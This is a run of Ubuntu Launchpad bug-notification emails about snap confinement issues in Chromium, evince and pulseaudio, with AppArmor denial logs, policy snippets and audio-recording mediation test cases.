I've added it to my trello card for 2.43 policy updates. ** Changed in: snapd (Ubuntu) Status: New => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1851211 Title: [snap] SoloKeys not supported by u2f-devices interface Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: This affects the current build of the snap version of Chromium. Although it was marked as fixed in the ticket here: https://bugs.launchpad.net/ubuntu/+source/chromium- browser/+bug/1738164 it is still open. No chance to use such a key in the browser. dmesg output is: My dmesg out put shows a lot of DENIED: audit: type=1107 audit(1572541712.846:243): pid=954 uid=106 auid=4294967295 ses=4294967295 msg='apparmor="DENIED" operation="dbus_method_call" bus="system" path="/" interface="org.freedesktop.DBus.ObjectManager" member="GetManagedObjects" mask="send" name="org.bluez" pid=20568 label="snap.chromium.chromium" peer_pid=946 peer_label="unconfined" exe="/usr/bin/dbus-daemon" sauid=106 hostname=? addr=? terminal=?' [ 7036.430639] audit: type=1400 audit(1572541713.042:244): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7036.430641] audit: type=1400 audit(1572541713.042:245): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/var/lib/snapd/desktop/icons/" pid=20568 comm="chrome" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 [ 7049.256201] audit: type=1400 audit(1572541725.870:246): apparmor="DENIED" operation="open" profile="snap.chromium.chromium" name="/sys/devices/pci:00/:00:15.1/i2c_designware.1/i2c-2/i2c-ELAN1200:00/0018:04F3:3022.0001/report_descriptor" pid=20568 comm="ThreadPoolForeg" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0 Suggested solutions in the other tickets do not work System is Ubuntu 19.10 on an Asus UX330 --- ProblemType: Bug ApportVersion: 2.20.11-0ubuntu8.2 Architecture: amd64 CurrentDesktop: ubuntu:GNOME DRM.card0-HDMI-A-1: enabled: enabled dpms: On status: connected edid-base64: AP///wAebcxW838CAAYUAQOANR54Cq7FoldKnCUSUFQhCACzAIGAgUABAQEBAQEBAQEBGjaAoHA4H0AwIDUAEyshAAAaAjqAGHE4LUBYLEUAEyshAAAe/QA4PR5TDwAKICAgICAg/ABXMjQ0MgogICAgICAgATICAyHxTpAEAwEUEgUfEBMAIwkHB4MBAABlAwwAEAACOoAYcTgtQFgsRQATKyEAAB4BHYAYcRwWIFgsJQATKyEAAJ4BHQByUdAeIG4oVQATKyEAAB6MCtCKIOAtEBA+lgATKyEAABgAJg== modes: 1920x1080 1920x1080 1920x1080 1920x1080 1920x1080i 1920x1080i 1920x1080i 1920x1080 1920x1080i 1680x1050 1280x1024 1280x960 1280x720 1280x720 1280x720 1280x720 1024x768 800x600 720x576 720x480 720x480 720x480 720x480 640x480 640x480 640x480 DRM.card0-eDP-1: enabled: disabled dpms: Off status: connected edid-base64: AP///wAGry0nABAZAQSVHRF4ArwFolVMmiUOUFQBAQEBAQEBAQEBAQEBAQEBFDeAuHA4JEAQED4AJaUQAAAY/gBBVU8KICAgICAgICAg/gBCMTMzSEFOMDIuNyAKAII= modes: 1920x1080 DiskUsage: Filesystem Type Size Used Avail Use% Mounted on /dev/sda6 ext4 184G 35G 140G 20% /home tmpfs tmpfs 7,8G 152M 7,7G 2% /dev/shm /dev/sda6 ext4 184G 35G 140G 20% /home DistroRelease: Ubuntu 19.10 InstallationDate: Installed on 2017-09-30 (766 days ago) InstallationMedia: Ubuntu 17.04 "Zesty Zapus" - Release amd64 (20170412) Lsusb: Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 004: ID 8087:0a2b Intel Corp. Bus 001 Device 003: ID 0bda:58d1 Realtek Semiconductor Corp. USB2.0 HD UVC WebCam Bus 001 Device 002: ID 046d:c52b Logitech, Inc. Unifying Receiver Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub MachineType: ASUSTeK COMPUTER INC. UX330UAK Package: chromium-browser 77.0.3865.120-0ubuntu1.19.10.1 PackageArchitecture: amd64 ProcEnviron: TERM=xterm-256color PATH=(custom, no user) XDG_RUNTIME_DIR= LANG=de_DE.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=33f0c319-6f77-49d2-85ed-236d397fc004 ro quiet splash vt.handoff=7 ProcVersionSignature: Ubuntu 5.3.0-19.20-generic 5.3.1 Snap.ChromeDriverVersion: ChromeDriver 78.0.3904.70 (edb9c9f3de0247fd912a77b7f6cae7447f6d3ad5-refs/branch-heads/3904@{#800}) Snap.ChromiumVersion: Chromium 78.0.3904.70 snap Tags: eoan snap Uname: Linux 5.3.0-19-generic x86_64 UpgradeStatus: Upgraded to eoan on 2019-10-23 (14 days ago) UserGroups: adm cdrom daemon dialout dip docker kvm lpadmin plugdev sambashare sudo www-data _MarkForUpload: True dmi.bios.date: 04/19/2019 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: UX330UAK.315 dmi.boar
[Desktop-packages] [Bug 1794064] Re: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap
** Changed in: evince (Ubuntu) Status: Confirmed => Triaged ** Changed in: evince (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1794064 Title: Clicking a hyperlink in a PDF fails to open it if the default browser is a snap Status in evince package in Ubuntu: Triaged Bug description: This is related to bug #1792648. After fixing that one (see discussion at https://salsa.debian.org/gnome-team/evince/merge_requests/1), clicking a hyperlink in a PDF opens it correctly if the default browser is a well-known application (such as /usr/bin/firefox), but it fails to do so if the default browser is a snap (e.g. the chromium snap). This is not a recent regression, it's not working on bionic either. ProblemType: Bug DistroRelease: Ubuntu 18.10 Package: evince 3.30.0-2 ProcVersionSignature: Ubuntu 4.18.0-7.8-generic 4.18.5 Uname: Linux 4.18.0-7-generic x86_64 NonfreeKernelModules: zfs zunicode zavl icp zcommon znvpair ApportVersion: 2.20.10-0ubuntu11 Architecture: amd64 CurrentDesktop: ubuntu:GNOME Date: Mon Sep 24 12:28:06 2018 EcryptfsInUse: Yes InstallationDate: Installed on 2016-07-02 (813 days ago) InstallationMedia: Ubuntu 16.04 LTS "Xenial Xerus" - Release amd64 (20160420.1) SourcePackage: evince UpgradeStatus: Upgraded to cosmic on 2018-09-14 (9 days ago) modified.conffile..etc.apparmor.d.abstractions.evince: [modified] mtime.conffile..etc.apparmor.d.abstractions.evince: 2018-09-24T11:35:41.904158 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1794064/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, I'll fix this in the next batch of policy updates for snapd. ** Changed in: snapd (Ubuntu) Importance: Undecided => Low ** Changed in: snapd (Ubuntu) Status: New => Triaged ** Changed in: snapd (Ubuntu) Assignee: (unassigned) => Jamie Strandboge (jdstrand) -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: Triaged Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Ok, that is a read on /home/ubuntu/.Private/. Is the encrypted home mounted at the time of the denial? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1848919] Re: [snap] Permission denied on Private encrypted folder
Encrypted home is typically setup as ~/.Private, not ~/Private and the policy already allows: owner @{HOME}/.Private/** mrixwlk, owner @{HOMEDIRS}/.ecryptfs/*/.Private/** mrixwlk, The home interface should already allow ~/Private. What is the denial you see in the logs? -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1848919 Title: [snap] Permission denied on Private encrypted folder Status in chromium-browser package in Ubuntu: Confirmed Status in snapd package in Ubuntu: New Bug description: When accessing the Private (/home/username/Private, Encrypted Directory) folder (e.g. via "Link save as...") it shows "Could not read contents of Private, Error opening directory ...: Permission denied" Package: chromium-browser Version: 77.0.3865.120-0ubuntu1~snap1 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1848919/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Changed in: pulseaudio (Ubuntu Xenial) Status: In Progress => Triaged ** Changed in: pulseaudio (Ubuntu Bionic) Status: In Progress => Triaged -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Triaged Status in pulseaudio source package in Bionic: Triaged Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :a
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] - Since the pulseaudio mediation behavior triggers when the security label - starts with 'snap.' it is su + IMPORTANT: if updating pulseaudio while the session is running, either + need to reboot for the test or kill pulseaudio so it can restart with + the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes xcb_connecti
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in- snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio-playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes - For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes - For strict snaps with audio-playback/audio-record: + $ sudo snap refresh core --candidate # make sure have 2.41. 'install' on 16.04 $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- record/common/ $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to me
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
Attaching test-snapd-pulseaudio and test-snapd-audio-record snaps. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: In Progress Status in pulseaudio source package in Bionic: In Progress Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] Since the pulseaudio mediation behavior triggers when the security label starts with 'snap.' it is su For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For strict snaps with pulseaudio: $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connecting which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes ... yes For strict snaps with audio-playback/audio-record: $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap $ snap connections test-snapd-audio-record # record not connected Interface PlugSlot Notes audio-playback test-snapd-audio-record:audio-playback :audio-playback - audio-recordtest-snapd-audio-record:audio-record-- $ test-snapd-audio-record.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /va
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
** Description changed: + [Impact] + Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. - # Original summary: pulseaudio built with --enable-snappy but 'Enable - Snappy support: no' + To correct this situation but not regress existing behavior, Ubuntu + 19.04's pulseaudio was updated patch to allow playback to all connected + clients (snaps or not), record by classic snaps (see bug 1787324) and + record by strict mode snaps if either the pulseaudio or new-in- + snapd-2.41 audio-record interfaces were connected. With this change, + snapd is in a position to migrate snaps to the new audio-playback and + audio-record interfaces and properly mediate audio recording (see + https://forum.snapcraft.io/t/upcoming-pulseaudio-interface- + deprecation/13418). + + The patch to pulseaudio consists of adding a module, enabling it in + default.pa and then when it is enabled, pulseaudio when faced with a + record operation will, when the connecting process is a snap (ie, its + security label (ie, apparmor label) starts with 'snap.'), query snapd + via its control socket to ask if the snap is classic and if not, whether + the pulseaudio or audio-record interfaces are connected. Adjusting + pulseaudio in the manner does not require coordination with any release + of snapd. It does need a newer version of snapd-glib, which was recently + updated to 1.49 in the last SRU. + + [Test Case] + + Since the pulseaudio mediation behavior triggers when the security label + starts with 'snap.' it is su + + For unconfined applications: + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For confined, non-snap applications: + $ sudo apt-get install evince + + $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav + && echo yes + + $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" + yes + + + For classic snaps: + $ sudo snap install test-snapd-classic-confinement --classic + + $ snap run --shell test-snapd-classic-confinement + + $ cat /proc/self/attr/current # verify we are classic confined + snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) + + $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" + yes + + $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording + ^Cyes + + $ paplay /tmp/out.wav && echo "yes" + yes + + For strict snaps with pulseaudio: + $ sudo snap install --dangerous ./test-snapd-pulseaudio_1_amd64.snap + + $ snap connections test-snapd-pulseaudio + Interface Plug Slot Notes + pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - + + $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- + pulseaudio/common/ + + $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is unrelated to mediation. x11 is + left out to ensure that just audio-playback/audio-record are tested) + + $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass + ... + ^Cyes + + $ test-snapd-pulseaudio.play /tmp/out.wav && echo yes + ... + yes + + + For strict snaps with audio-playback/audio-record: + $ sudo snap install --dangerous ./test-snapd-audio-record_1_amd64.snap + + $ snap connections test-snapd-audio-record # record not connected + Interface PlugSlot Notes + audio-playback test-snapd-audio-record:audio-playback :audio-playback - + audio-recordtest-snapd-audio-record:audio-record-- + + $ test-snapd-audio-record.play --help # ensure SNAP dirs are created + ... + + $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd-audio- + record/common/ + + $ test-snapd-audio-record.play /var/snap/test-snapd-audio-record/common/Noise.wav && echo yes + xcb_connection_has_error() returned true + yes + + (note, the xcb_connection_has_error() message is due to the x11 + interface not being connecting which is un
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
